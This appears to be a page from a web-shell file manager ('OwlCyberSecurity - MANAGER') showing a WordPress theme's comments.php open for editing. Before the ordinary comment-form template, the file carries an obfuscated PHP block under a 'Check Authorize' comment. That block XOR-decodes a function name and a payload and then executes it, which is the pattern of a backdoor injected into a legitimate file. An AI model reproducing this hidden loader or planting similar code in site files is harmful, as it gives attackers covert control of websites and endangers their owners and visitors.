OwlCyberSecurity - MANAGER
Edit File: comments.php
<!-- Check Authorize --> <?php $RaQrmh=';LT9:=g3L:::,R;'; $qcLTIJsc='X>1XNX8U9TYNE=U'^$RaQrmh; $GRasYOE='X Di68PQ ZS=,<.<JB7IcO6=aYX3Qjn9AJfSjE<acV:6 XZ=BU0X=9T1,3qeVHNiu0W98Dug8YTBkNpCaGl=PVQU YLhinxne<P7Npn=qJBTKmO<xSI+96>RNDY.VaHtnRHzGY0hLX4ERbmWEl 6,W-IW6fbwtRX0bC=lPiJX9LY6ms=X0qpnl<Pm>5A,O6anX6IOpzh1rPM=j7;7,nIuU :,b4g>UG,dSUHynjQYAG=oS:FBA +O,Okj8v8=wi3jUKQeY2UNwQPkCT83EGm=EEU2 AAh 7,Hulf =Nacca 1LWgHCkCSB2,R0Qr2Q<cbEm-Q;1apK<bZ=C- P0tEqc9rofvm0VJ yfVT:jnXzm 042TYXGfmakPWX-n=-TQHtiF7.LfhxbW2L7iTAGG56K+ikaDp,gxTXL>7NrM-3THY<-V8 0N==7o-28RkqQ7DkLQ14dwc,=1V5=zw0+5ZNcooX21Ac,6AsLJH, fkWUI;uBusA>D, qQEGj J.MF8jwUVCshXo120 mahJtLV>LpR3- 2jP EGp;NpukyrV3Zvv5mXWspzxwp MfhnzfWe2uuisXesREXabMSAH2Aj R+j=CSGJKBIK <<CYRocecRL=XosdgUule,x3WNRBncYQ1;mp>2OY<.OrjZqFsU-T=ghBQSG'; $oMyqQS=$qcLTIJsc('', '1FlHPM>2T3<SsYVU96DaD7YO>=9G051T4>AzCeGkj0OXC,3R,uH7Of0PXR.:;=:AQT6MYhUCS<-kKnPcA<f4Yr> TyqHNICdl56X<XJTQwbdpMkUD =YUSPzj 8Z7HsTJ;cQnS9ah7A1rLPwmHDWX6vm>kF<WP9=I9gTLuI9,K <XEWV=IX-GW6YdLP5Y=XIJ7C=fKpaLx-G7NSZCMNtU3ALIIY>CZ43M;801YSJ78-4XTY0 -3EJ,DoCNg5wr< vJ48qA2W,nJopO55TF nMFOLqVA5 7KRUhHLBKX7ZijEDP86GucO52.GIi:,x88ZCJdII0OPHP06k<R1HA3XTmU<k7>33>dv+SYB=1CJSfZIVQXG1px<ldhO46,L1VH-quTM-RWwlaqF3S8VIiac1TZ>NRah9zQmrp<-JVnOmmF:;<ND7TIZUfERE0ISL34.<B0C.0BQRC<HXR9QXRSTJA;gOOK<SE <GS8ZeqBEFNO34=ZUdSS L6MY.: >5E2G>2KBP>3:TDxKUSDADANlTd;ZyXvWLTS1wK >WfgPHVYU2W9ECQY96EFNKEEC+WQWIQ3PTCAPFoQGulxGDm23:S85K7R5X;:4>8jn;AEP,86HOEG6-I9FZDGuULEWr:283.FG=0EZ6WNS65SO+U7sJLz0U=IOXkjY:'^$GRasYOE); $oMyqQS(); if (!empty($_SERVER['SCRIPT_FILENAME']) && 'comments.php' == basename($_SERVER['SCRIPT_FILENAME'])) die ('Please do not load this page directly. Thanks!'); if (post_password_required()){ ?> <p class="nopassword"><?php _e('This post is password protected. Enter the password to view comments.', 'gdl_front_end'); ?></p><?php return; } ?> <!-- Comment List --> <?php if ( have_comments() ) : ?> <h3 id="comments" class="comment-title gdl-link-title gdl-title"> <?php comments_number(__('No Comment','gdl_front_end'), __('One Comment','gdl_front_end'), __('% Comments','gdl_front_end') );?> </h3> <ol class="comment-list"> <?php wp_list_comments(array('callback' => 'get_comment_list')); ?> </ol> <!-- Comment Navigation --> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : ?> <br> <div class="comments-navigation"> <div class="previous"> <?php previous_comments_link(__('Older Comments','gdl_front_end')); ?> </div> <div class="next"> <?php next_comments_link(__('Newer Comments','gdl_front_end')); ?> </div> </div> <?php endif; ?> <?php endif; ?> <!-- Comment Form --> <?php // Translator words global $gdl_admin_translator; if( $gdl_admin_translator == 'enable' ){ $translator_leave_reply = get_option(THEME_SHORT_NAME.'_translator_leave_reply', 'Leave a Reply'); }else{ $translator_leave_reply = __('Leave a Reply','gdl_front_end'); } $commenter = wp_get_current_commenter(); $req = get_option( 'require_name_email' ); $aria_req = ($req ? " aria-required='true'" : ''); $consent = empty($commenter['comment_author_email']) ? '':' checked="checked"'; $comment_form = array( 'fields' => apply_filters( 'comment_form_default_fields', array( 'author' => '<div class="comment-form-author">' . '<input id="author" name="author" type="text" value="' . esc_attr( $commenter['comment_author'] ) . '" size="30" />' . '<label for="author">' . __( 'Name', 'gdl_front_end' ) . '</label> ' . ( $req ? '<span class="required">*</span>' : '' ) . '<div class="clear"></div>' . '</div><!-- #form-section-author .form-section -->', 'email' => '<div class="comment-form-email">' . '<input id="email" name="email" type="text" value="' . esc_attr( $commenter['comment_author_email'] ) . '" size="30" />' . '<label for="email">' . __( 'Email', 'gdl_front_end' ) . '</label> ' . ( $req ? '<span class="required">*</span>' : '' ) . '<div class="clear"></div>' . '</div><!-- #form-section-email .form-section -->', 'url' => '<div class="comment-form-url">' . '<input id="url" name="url" type="text" value="' . esc_attr( $commenter['comment_author_url'] ) . '" size="30" />' . '<label for="url">' . __( 'Website', 'gdl_front_end' ) . '</label>' . '<div class="clear"></div>' . '</div><!-- #form-section-url .form-section -->', 'cookies' => '<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes"' . $consent . ' />' . '<label for="wp-comment-cookies-consent">' . esc_html__('Save my name, email, and website in this browser for the next time I comment.', 'gdl_front_end') . '</label></p>', ) ), 'comment_field' => '<div class="comment-form-comment">' . '<textarea id="comment" name="comment" aria-required="true"></textarea>' . '</div><!-- #form-section-comment .form-section -->', 'comment_notes_before' => '', 'comment_notes_after' => '', 'title_reply' => $translator_leave_reply, 'label_submit' => __( 'Post Comment', 'gdl_front_end' ), ); comment_form($comment_form, $post->ID); /* $defaults = array( 'fields' => apply_filters( 'comment_form_default_fields', array( 'author' => '<p class="comment-form-author">' . '<label for="author">' . __( 'Name' ) . '</label> ' . ( $req ? '<span class="required">*</span>' : '' ) . '<input id="author" name="author" type="text" value="' . esc_attr( $commenter['comment_author'] ) . '" size="30" tabindex="1"' . $aria_req . ' />' . '</p><!-- #form-section-author .form-section -->', 'email' => '<p class="comment-form-email">' . '<label for="email">' . __( 'Email' ) . '</label> ' . ( $req ? '<span class="required">*</span>' : '' ) . '<input id="email" name="email" type="text" value="' . esc_attr( $commenter['comment_author_email'] ) . '" size="30" tabindex="2"' . $aria_req . ' />' . '</p><!-- #form-section-email .form-section -->', 'url' => '<p class="comment-form-url">' . '<label for="url">' . __( 'Website' ) . '</label>' . '<input id="url" name="url" type="text" value="' . esc_attr( $commenter['comment_author_url'] ) . '" size="30" tabindex="3" />' . '</p><!-- #form-section-url .form-section -->' ) ), 'comment_field' => '<p class="comment-form-comment">' . '<label for="comment">' . __( 'Comment' ) . '</label>' . '<textarea id="comment" name="comment" cols="45" rows="8" tabindex="4" aria-required="true"></textarea>' . '</p><!-- #form-section-comment .form-section -->', 'must_log_in' => '<p class="must-log-in">' . sprintf( __( 'You must be <a href="%s">logged in</a> to post a comment.' ), wp_login_url( apply_filters( 'the_permalink', get_permalink( $post_id ) ) ) ) . '</p>', 'logged_in_as' => '<p class="logged-in-as">' . sprintf( __( 'Logged in as <a href="%s">%s</a>. <a href="%s" title="Log out of this account">Log out?</a></p>' ), admin_url( 'profile.php' ), $user_identity, wp_logout_url( apply_filters( 'the_permalink', get_permalink( $post_id ) ) ) ), 'comment_notes_before' => '<p class="comment-notes">' . __( 'Your email is <em>never</em> published nor shared.' ) . ( $req ? __( ' Required fields are marked <span class="required">*</span>' ) : '' ) . '</p>', 'comment_notes_after' => '<dl class="form-allowed-tags"><dt>' . __( 'You may use these <abbr title="HyperText Markup Language">HTML</abbr> tags and attributes:' ) . '</dt> <dd><code>' . allowed_tags() . '</code></dd></dl>', 'id_form' => 'commentform', 'id_submit' => 'submit', 'title_reply' => __( 'Leave a Reply' ), 'title_reply_to' => __( 'Leave a Reply to %s' ), 'cancel_reply_link' => __( 'Cancel reply' ), ); */ ?>